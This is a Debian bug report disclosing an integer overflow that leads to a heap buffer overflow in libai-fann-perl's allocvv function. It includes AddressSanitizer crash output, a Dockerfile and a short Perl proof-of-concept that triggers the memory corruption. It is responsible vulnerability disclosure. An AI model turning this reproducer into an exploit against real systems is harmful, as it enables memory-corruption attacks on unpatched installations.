Bug#948463: libai-fann-perl: Integer overflow leading to heap buffer overflow

Jayakrishna Vadayath Wed, 08 Jan 2020 14:27:29 -0800

Package: libai-fann-perl
Severity: normal

Dear Maintainer,


As a part of an academic project, we have discovered an integer overflow
which can lead to a heap buffer overflow in the libai-fann-package.

The vulnerability lies in morefann.c:allocvv where two user controlled
integers are used in a multiplication. These integers are not checked
for upper bounds and can therefore overflow the integer space and wrap
around to a small value. The result of this multiplication is used to
allocate a buffer on the heap. Therefore, this integer overflow could
lead to a very small buffer being allocated. Since this buffer is then
written to in a loop, this ends up in a heap buffer overflow situation.

I have attached a Dockerfile and a perl script that recreate this
vulnerability.

The output on running the docker image built from this docker file
should be as follows.

=================================================================
==7==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000017150 at 
pc 0x7f99639ea055 bp 0x7ffd6582e560 sp 0x7ffd6582e558
WRITE of size 8 at 0x602000017150 thread T0
    #0 0x7f99639ea054  
(/usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/AI/FANN/FANN.so+0xf054)
    #1 0x559c976ef440  (/usr/bin/perl+0xdc440)
    #2 0x559c976e7265  (/usr/bin/perl+0xd4265)
    #3 0x559c97668396  (/usr/bin/perl+0x55396)
    #4 0x559c9763f491  (/usr/bin/perl+0x2c491)
    #5 0x7f99672e5b96  (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #6 0x559c9763f4d9  (/usr/bin/perl+0x2c4d9)

0x602000017151 is located 0 bytes to the right of 1-byte region 
[0x602000017150,0x602000017151)
allocated by thread T0 here:
    #0 0x7f9967f7b6d0  
(/usr/lib/llvm-6.0/lib/clang/6.0.0/lib/linux/libclang_rt.asan-x86_64.so+0x1056d0)
    #1 0x7f99639f7086  
(/usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/AI/FANN/FANN.so+0x1c086)

SUMMARY: AddressSanitizer: heap-buffer-overflow 
(/usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/AI/FANN/FANN.so+0xf054)
Shadow bytes around the buggy address:
  0x0c047fffadd0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd
  0x0c047fffade0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
  0x0c047fffadf0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd
  0x0c047fffae00: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 04
  0x0c047fffae10: fa fa fd fd fa fa 00 04 fa fa 00 04 fa fa fd fd
=>0x0c047fffae20: fa fa fd fd fa fa 00 04 fa fa[01]fa fa fa fd fd
  0x0c047fffae30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7==ABORTING


Please investigate this issue.


-- System Information:
Debian Release: buster/sid
  APT prefers bionic-updates
  APT policy: (500, 'bionic-updates'), (500, 'bionic-security'), (500, 
'bionic'), (100, 'bionic-backports')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.15.0-74-generic (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages libai-fann-perl depends on:
ii  libc6                       2.27-3ubuntu1
pn  libfann2                    <none>
ii  perl                        5.26.1-6ubuntu0.3
ii  perl-base [perlapi-5.26.1]  5.26.1-6ubuntu0.3

libai-fann-perl recommends no packages.

libai-fann-perl suggests no packages.

from ubuntu:18.04

run apt-get update
run apt-get -y install perl clang wget libfann-dev
workdir /tmp
run wget 
http://deb.debian.org/debian/pool/main/liba/libai-fann-perl/libai-fann-perl_0.10.orig.tar.gz
run tar -xvf libai-fann-perl_0.10.orig.tar.gz
workdir /tmp/AI-FANN-0.10/
run perl Makefile.PL CC=clang CCCDLFLAGS='-fsanitize=address -fPIC' LD=clang 
LDDLFLAGS='-fsanitize=address -shared -L/usr/local/lib -fstack-protector-strong 
-shared-libasan'
run make
run make install
workdir /tmp/
copy ./run.pl /tmp/run.pl
cmd 
LD_PRELOAD=/usr/lib/llvm-6.0/lib/clang/6.0.0/lib/linux/libclang_rt.asan-x86_64.so
 perl /tmp/run.pl

#!/usr/bin/perl

use AI::FANN qw(:all);

my $n = 65536;

my $train = AI::FANN::TrainData->new_empty($n, $n, 1);
my @values = (0..$n-1);
$train->data($_, [@values], 1);

Bug#948463: libai-fann-perl: Integer overflow leading to heap buffer overflow

Reply via email to